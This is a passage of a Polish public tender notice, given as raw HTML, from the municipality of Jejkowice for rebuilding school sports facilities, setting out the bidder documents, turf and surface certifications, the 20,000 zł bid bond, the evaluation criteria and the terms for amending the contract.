zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lubKasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawcanie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego niewcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie doudziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumieniez właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami,w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległychpłatności lub wstrzymanie w całości wykonania decyzji właściwego organu;</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">7. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełnieniawarunków udziału w postępowaniu (pkt. 3.1 i 3.2 niniejszego rozdziału SIWZ), zostaniewezwany do przedłożenia następujących oświadczeń i dokumentów (aktualnych na dzieńzłożenia oświadczeń lub dokumentów):7.1. w celu wykazania przez Wykonawcę spełnienia warunku określonego w pkt. 3.1.:potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresieprowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przezZamawiającego;UWAGA4: Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającegodokumentów, o których mowa w pkt. 7.1, Zamawiający dopuszcza złożenie przez Wykonawcę innychdokumentów, o których mowa w art. 26 ust 2c ustawy.7.2 w celu wykazania przez Wykonawcę spełnienia warunku określonego w pkt. 3.2.1.:wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływemterminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodówokreślających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tymczy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przyczym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, narzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnymcharakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty;7.3 w celu wykazania przez Wykonawcę spełnienia warunku określonego w pkt. 3.2.2.:wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególnościodpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wrazz informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a takżezakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymiosobami;7.4. dotyczy wszystkich warunków udziału w postępowaniu:dokument (np. zobowiązanie) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnychzasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności lub sytuacji innych podmiotówna zasadach określonych w art. 22a ustawy.Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przezpodmiot udostępniający zasoby.;UWAGA5 (dotyczy wszystkich oświadczeń i dokumentów):1) Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzającychspełnianie warunków udziału w postępowaniu lub brak podstaw wykluczenia, jeżeli Zamawiającyposiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lub może je uzyskać za pomocąbezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniuustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadaniapubliczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352),2) w przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formieelektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych bazdanych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcęoświadczenia lub dokumenty,3) w przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów na potwierdzenie brakupodstaw wykluczenia lub spełniania warunków udziału w postępowaniu, w formie elektronicznejpod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych,Zamawiający żąda od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przezWykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów,4) w przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów, które znajdują sięw posiadaniu Zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanychprzez Zamawiającego zgodnie z art. 97 ust. 1 ustawy, Zamawiający w celu potwierdzeniaokoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy (brak podstaw wykluczenia orazspełnianie warunków udziału w postępowaniu określonych przez Zamawiającego), korzystaz posiadanych oświadczeń lub dokumentów, o ile są one aktualne</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">8. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu potwierdzeniaokoliczności o których mowa w art. 25 ust. 1 pkt. 2 ustawy PZP tj. spełnienia przezoferowane dostawy, usługi lub roboty budowlane wymagań określonych przezZamawiającego, zostanie wezwany do przedłożenia następujących dokumentów:Wykaz dokumentów potwierdzających spełnianie warunków jakościowych wypełnienia trawy:- Rodzaj wypełnienia zgodny z raportem z badań nawierzchni trawy syntetycznej przeprowadzoneprzez akredytowane laboratorium np. Labosport lub ISA-Sport lub Sports Labs Ltd);- Raport z badań na zawartość metali ciężkich dla wypełnienia przeprowadzone przez akredytowanelaboratorium EN 71 3;- Karta techniczna wypełnienia;- Badania toksykologiczne i na palność przeprowadzone przez akredytowane laboratorium.- Wymagane atesty i badania dla projektowanej nawierzchni:1) Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISASport lub Sports Labs Ltd),dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of TestMethods for Football Turf (dostępny na FIFA.com).2) Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub aprobata techniczna ITB lubrekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzająceparametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokumentrównoważny.3) Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.4) Atest PZH dla oferowanej nawierzchni.5) Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycjęwraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.6) Zastosowane materiały muszą spełniać wymogi ,,Ustawy o Wyrobach Budowlanych" Dz.U. 04.92.881 a w szczególności art. 4 i 5.- Wymagane atesty i badania dla projektowanej nawierzchni EPDM:1)Certyfikat lub deklaracja zgodności z norma PN-EN 14877:2008, lub aprobata techniczna ITB, lubrekomendacja techniczna ITB, lub wyniki badan specjalistycznego laboratorium potwierdzająceparametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.2)Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.3)Atest PZH dla oferowanej nawierzchni.4)Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowanainwestycje wraz z potwierdzeniem gwarancji udzielonej przez producenta na ta nawierzchnie.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz oferty wraz z załącznikami do oferty; 2. Dokument (np. zobowiązanie) innychpodmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzebyrealizacji, o ile Wykonawca korzysta ze zdolności lub sytuacji innych podmiotów nazasadach określonych w art. 22a ustawy; 3. Pełnomocnictwo ustanowione doreprezentowania Wykonawcy/ ów ubiegającego / cych się o udzielenie zamówieniapublicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej zazgodność z oryginałem notarialnie; 4. Potwierdzenie wpłaty wadium; 5. Wykonawcy w celupotwierdzenia braku podstawy do wykluczenia z postępowania, o której mowa w art. 24 ust.1 pkt. 23 ustawy, składają, stosownie do treści art. 24 ust. 11 ustawy (w terminie 3 dni oddnia zamieszczenia przez Zamawiającego na stronie internetowej informacji z otwarciaofert, tj. informacji, o których mowa w art. 86 ust. 5 ustawy), oświadczenia oprzynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa wart. 24 ust. 1 pkt 23 ustawy. W przypadku przynależności do tej samej grupy kapitałowejwykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacjepotwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłóceniakonkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Wykonawca zobowiązany jest wnieść wadium w wysokości:20 000,00 zł. (słownie złotych: dwadzieścia tysięcy00/100).2. Wadium wnosi się przed upływem terminu składania ofert. Zamawiający zaznacza, iż Wykonawcapowinien dochować należytej staranności, by jego oferta była zabezpieczona wadium przed upływemterminu składania ofert. Należy wziąć pod uwagę czas trwania realizacji przelewów pomiędzy różnymibankami.3. Wadium może być wniesione w następujących formach:3.1 pieniądzu - przelewem wpłacane na rachunek Urzędu Gminy w Jejkowicach Bank Pekao S.A. Oddział Jejkowice nr: 12 1240 4403 1111 0000 5265 3186 z tytułem przelewu: ,,Wadium - Przebudowa szkolnych obiektów sportowych przy ul. Szkolnej w Jejkowicach"3.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, żeporęczenie kasy jest zawsze poręczeniem pieniężnym,3.3 gwarancjach bankowych,3.4 gwarancjach ubezpieczeniowych,3.5 poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r.Nr 42, poz. 275 z późn. zm.).4. Dopuszczalne jest złożenie wadium w więcej niż jednej formie.5. Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię,poświadczoną ,,za zgodność z oryginałem", wpłaty wadium z potwierdzeniem dokonanego przelewu.6. W przypadku wniesienia wadium w formie innej niż w pieniądzu - oryginał dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty, w osobnej kopercie - opisanej ,,wadium" (nie łączyć go na trwale z ofertą). Ponadto kopię dokumentu wadium potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.7. W przypadku składania przez Wykonawcę wadium w formie gwarancji i poręczeń dokument musispełniać następujące wymogi:7.1 być wystawiony na Gminę Jejkowice (ul. Główna 38a, 44-290 Jejkowice)7.2 zawierać nieodwołalne i bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającegow terminie związania ofertą, zobowiązanie Gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnejkwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówieńpublicznych,7.3 gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta(poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechańopisanych w art. 46 ust. 4a i 5 ustawy Pzp dla każdego z tych Wykonawców,7.4 Gwarancja musi być podpisana przez upoważnionego przedstawiciela Gwaranta. Podpis winien byćsporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lubczytelny (z podaniem imienia i nazwiska).7.5 Gwarancja bankowa lub ubezpieczeniowa może być wystawiona na wszystkich członków konsorcjumlub na jednego z nich np. na lidera. Brak podania w treści gwarancji nazwy partnera nie ma znaczeniadla oceny skutków prawnych udzielonej gwarancji. Dotyczy to również wadium wniesionego w formiepieniężnej (wystarczy, że wniesie je jeden członek konsorcjum np. lider).8. Okres ważności wadium nie może być krótszy niż okres związania ofertą.9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze ofertynajkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostaławybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 1210. Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca:10.1 w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a Prawa zamówień publicznych,z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzającychokoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o których mowa w art. 25a ust. 1ustawy, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jakonajkorzystniejszej;10.2 którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego nawarunkach określonych w ofercie;10.3 którego oferta została wybrana, nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;10.4 zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących postronie Wykonawcy.11. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium napodstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostaławybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przezZamawiającego.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadiumniezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenianależytego wykonania umowy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin wykonania</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Przedłużenie gwarancji jakości</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiany do umowy możliwe są jedynie w trybie art. 144 ustawy Prawo zamówieńpublicznych. 2. Dopuszcza się możliwość dokonania zmian postanowień umowy w stosunkudo treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika z następującychokoliczności: 2.1 Zmiany wynagrodzenia, w następstwie: a) zmiany stawki podatku odtowarów i usług - (będącej skutkiem działań organów państwowych, ustawowa zmianaobowiązującej stawki podatku od towarów i usług lub wprowadzenie nowego podatku). Wtakim przypadku wartość wynagrodzenia netto nie ulega zmianie, jedynie wartośćwynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów. Zmianawynagrodzenia odnosić się będzie do części przedmiotu umowy niezrealizowanej, po dniuwejścia w życie przepisów zmieniających lub wprowadzających stawkę podatku od towarów iusług VAT oraz do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawkipodatku od towarów i usług VAT lub wprowadzenie nowego podatku. W przypadkuzaistnienia opisanej sytuacji po wejściu w życie przepisów będących przyczyną waloryzacji,Wykonawca zwraca się do Zamawiającego z wnioskiem o dokonanie odpowiedniej zmianywynagrodzenia - wskaże kwotę, o którą wynagrodzenie Wykonawcy ma ulec zmianie, orazdatę, od której nastąpiła bądź nastąpi zmiana wysokości kosztów wykonania umowyuzasadniająca zmianę wysokości wynagrodzenia należnego Wykonawcy. Zmiana stawkipodatku VAT nie dotyczy Wykonawców którzy nie są płatnikami podatku VAT, 2) Zmianaterminu wykonania może nastąpić w przypadku: a) zawieszenia przez Zamawiającegowykonania robót z przyczyn technicznych, b) wystąpienia warunków 